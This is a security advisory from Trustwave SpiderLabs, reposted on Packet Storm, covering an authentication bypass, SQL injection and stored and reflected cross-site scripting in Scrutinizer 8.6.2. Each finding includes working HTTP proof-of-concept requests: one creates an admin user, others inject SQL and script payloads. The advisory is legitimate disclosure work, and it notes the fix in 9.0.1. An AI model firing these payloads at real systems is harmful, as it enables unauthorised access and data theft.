Scrutinizer 8.6.2 Bypass / Cross Site Scripting / SQL Injection

2012-04-12T00:00:00
ID PACKETSTORM:111791
Type packetstorm
Reporter Tanya Secker
Modified 2012-04-12T00:00:00

Description

                                        
                                            `Trustwave SpiderLabs Security Advisory TWSL2012-008:  
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer  
  
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt  
  
Published: 04/11/12  
Version: 1.0  
  
Vendor: Plixer International (http://www.plixer.com)  
Product: Scrutinizer NetFlow and sFlow Analyzer  
Version affected: 8.6.2 (8.6.2.16204) confirmed; others may be vulnerable  
  
Product description:  
Network analysis tool for monitoring the overall network health and reports  
on which hosts, applications, protocols, etc. that are consuming network  
bandwidth.  
  
Credit: Tanya Secker of Trustwave SpiderLabs  
  
Finding 1: HTTP Authentication Bypass Vulnerability  
CVE: CVE-2012-1258  
  
The Scrutinizer web console provides a form-based login facility, requiring  
users to authenticate to gain access to further functionality. A tiered  
user access model is also used, where administrative and standard users  
have a different selection of permissible functions. Authentication and  
authorization is controlled by the cookie-based session management system.  
Although this is implemented in a standardized way, the session tokens are  
not required to perform privileged functions, such as adding users.  
  
Example:  
  
This request will add a user named "trustwave" with the password of  
"trustwave" to the administrative user group.  
  
#Request  
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Proxy-Connection: keep-alive  
#Response  
HTTP/1.1 200 OK  
Date: Thu, 17 Nov 2011 10:19:25 GMT  
Server: Apache  
Vary: Accept-Encoding  
Content-Type: text/html; charset=utf-8  
Content-Length: 19  
  
{"new_user_id":"9"}  
  
  
Finding 2: SQL Injection  
CVE: CVE-2012-1259  
  
The Scrutinizer web console is prone to unauthenticated SQL Injection  
attacks due to user input not being appropriately validated and passed  
directly to the backend. An attacker could exploit this vulnerability to  
attempt to gain access to sensitive information within the database or to  
perform other attacks on the system.  
  
Example 1:  
  
These requests/responses below show a blind SQL injection vector, where a  
proof of concept is used to return a syntactically correct response from  
the server (200 OK) followed by an incorrect one (500 Internal Server  
Error).  
  
#Request 1  
GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20AND%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1  
Host: 127.0.0.1  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)  
Connection: close  
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi  
  
#Response 1  
HTTP/1.1 200 OK  
Date: Tue, 31 Jan 2012 23:51:46 GMT  
Server: Apache  
Vary: Accept-Encoding  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 230  
  
#Request 2  
GET /cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=on&name%3anew7%3a7=on&name%3anew27%3a27=on&name%3anew13%3a13=on&standalone=&name%3anew5%3a5=on&name%3anew14%3a14=on&name%3anew9%3a9=on&user_id=&name%3anew23%3a23=on&name%3anew17%3a17=on&name%3anew11%3a11=on&name%3anew24%3a24=on&addip=')%20ANffD%20('a'='a&name%3anew18%3a18=on&name%3anew21%3a21=on&name%3anew19%3a19=on&name%3anew22%3a22=on&nbaupdate=1&name%3anew12%3a12=on&name%3anew25%3a25=on&name%3anew2%3a2=on&name%3anew1%3a1=on&name%3anew10%3a10=on&name%3anew15%3a15=on&name%3anew26%3a26=on&name%3anew4%3a4=on&name%3anew6%3a6=on HTTP/1.1  
Host: 127.0.0.1  
Accept: */*  
Accept-Language: en  
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)  
Connection: close  
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi  
  
#Response 2  
HTTP/1.1 500 Internal Server Error  
Date: Tue, 31 Jan 2012 23:52:18 GMT  
Server: Apache  
Last-Modified: Fri, 17 Dec 2010 02:01:03 GMT  
ETag: "900000001d93e-448-497918ae295c0"  
Accept-Ranges: bytes  
Content-Length: 1096  
Vary: Accept-Encoding  
Connection: close  
Content-Type: text/html  
  
Example 2:  
  
The "getPermissionsAndPreferences" variable within the following request is  
also vulnerable to a blind time-based attack. The example payload included  
will result in the server taking a delay of approximately five seconds  
before returning a response.  
  
#Request  
http://127.0.0.1/cgi-bin/login.cgi?getPermissionsAndPreferences=1%20AND%20SLEEP(5)&session_id=OyAOiECuFdtRbEBY&nocache=12_13_12_734  
  
Example 3:  
  
It should be noted that the other area referenced below returns SQL errors  
when a comment character is introduced into the bolded parameters and may  
therefore also indicate that they are vulnerable to SQL injection. The  
below request demonstrates this activity.  
  
#Request  
http://127.0.0.1/d4d/alarms.php?loadAlarms=1&user_id=1&step=10&page=0&search_str=test&column=msg&fa_algorithm=all&order=modified_ts  
  
  
Finding 3: Persistent Cross-site Scripting  
CVE: CVE-2012-1260  
  
The Scrutinizer web console stores unmodified user-supplied parameters  
within its database. No input validation or character encoding is  
performed, resulting in the possibility of client-supplied variables  
forming aspects of page content in such a way as to affect the syntax of  
the HTML content.  
  
Example:  
  
The below requests/response demonstrate how an attacker could use this to  
implant arbitrary Javascript via the "newUser" parameter.  
  
#Request 1  
GET /cgi-bin/userprefs.cgi?newUser=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&pwd=guest2&selectedUserGroup=1&= HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Proxy-Connection: keep-alive  
Content-Length: 6  
  
Accessing the "Admin" Panel using the below URL results in the stored  
JavaScript executing in the browser. It is noted that due to the previous  
flaw documented above this may also be executed unauthenticated and results  
in the disclosure of all user group names and IDs, along with all usernames  
and userids stored in the application. This is achieved via the following  
URL:  
  
#Request 2  
http://127.0.0.1/cgi-bin/userprefs.cgi?menu=1&nocache=5_26_33_895  
  
#Response 2  
HTTP/1.1 200 OK  
Date: Thu, 17 Nov 2011 10:40:34 GMT  
Server: Apache  
Vary: Accept-Encoding  
Content-Type: text/html; charset=utf-8  
Content-Length: 276  
  
{"groups":[{"name":"<script>alert(2)</script>","id":"4"},{"name":"<script>alert(document.cookie)</script>","id":"3"},{"name":"Administrators","id":"1"},{"name":"Guests","id":"2"}],"users":[{"name":"\"><script>alert(1)</script>","user_id":"12"},{"name":"admin","user_id":"1"}]}  
  
  
Finding 4: Reflected Cross-site Scripting  
CVE: CVE-2012-1261  
  
The Scrutinizer web console suffers from a Cross Site Scripting  
vulnerability in the 'standalone' variable of the  
'cgi-bin/scrut_fa_exclusions.cgi' page. No input validation or character  
encoding is performed, resulting in the possibility of client-supplied  
variables forming aspects of page content in such a way as to affect the  
syntax of the HTML content.  
  
Example:  
  
The below request demonstrates the reflective cross-site scripting  
vulnerability by supplying arbitrary JavaScript to the standalone variable.  
  
#Request  
GET /cgi-bin/scrut_fa_exclusions.cgi?init=1&standalone="><script>alert('xss')</script> HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 115  
Proxy-Connection: keep-alive  
Referer: http://127.0.0.1/cgi-bin/myview.cgi?init=1  
Content-Length: 4  
  
Note: Only one example of each vulnerability is provided but the problem is  
categorized as "systemic" due to the potential to store or render script  
code within multiple similar regions, such as in user group and alarm  
areas, respectively.  
  
  
Vendor Response:  
The vendor has declined to comment on these findings. These issues appear  
to have been fixed in version 9.0.1.  
  
Remediation Steps:  
Plixer International appeared to address all issues in version 9.0.1  
(9.0.1.19899). It is strongly recommended that the latest stable  
version is installed.  
  
Additionally, Trustwave SpiderLabs has added rules to the ModSecurity  
Commercial Rules Feed for these issues, and Trustwave's vulnerability  
scanning solution, TrustKeeper, has been updated to detect all findings.  
  
References  
1. http://www.plixer.com  
2. http://blog.spiderlabs.com  
  
Vendor Communication Timeline:  
2/15/12: Attempted to contact vendor regarding vulnerability  
Repeated attempts throughout February and March without response  
04/11/12 - Released after confirming fix in version 9.0.1 (9.0.1.19899)  
  
About Trustwave:  
Trustwave is the leading provider of on-demand and subscription-based  
information security and payment card industry compliance management  
solutions to businesses and government entities throughout the world. For  
organizations faced with today's challenging data security and compliance  
environment, Trustwave provides a unique approach with comprehensive  
solutions that include its flagship TrustKeeper compliance management  
software and other proprietary security solutions. Trustwave has helped  
thousands of organizations--ranging from Fortune 500 businesses and large  
financial institutions to small and medium-sized retailers--manage  
compliance and secure their network infrastructure, data communications and  
critical information assets. Trustwave is headquartered in Chicago with  
offices throughout North America, South America, Europe, Africa, China and  
Australia. For more information, visit https://www.trustwave.com  
  
About Trustwave SpiderLabs:  
SpiderLabs(R) is the advanced security team at Trustwave focused on  
application security, incident response, penetration testing, physical  
security and security research. The team has performed over a thousand  
incident investigations, thousands of penetration tests and hundreds of  
application security tests globally. In addition, the SpiderLabs Research  
team provides intelligence through bleeding-edge research and proof of  
concept tool development to enhance Trustwave's products and services.  
https://www.trustwave.com/spiderlabs  
  
Disclaimer:  
The information provided in this advisory is provided "as is" without  
warranty of any kind. Trustwave disclaims all warranties, either express or  
implied, including the warranties of merchantability and fitness for a  
particular purpose. In no event shall Trustwave or its suppliers be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages, even if  
Trustwave or its suppliers have been advised of the possibility of such  
damages. Some states do not allow the exclusion or limitation of liability  
for consequential or incidental damages so the foregoing limitation may not  
apply.  
  
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.  
  
`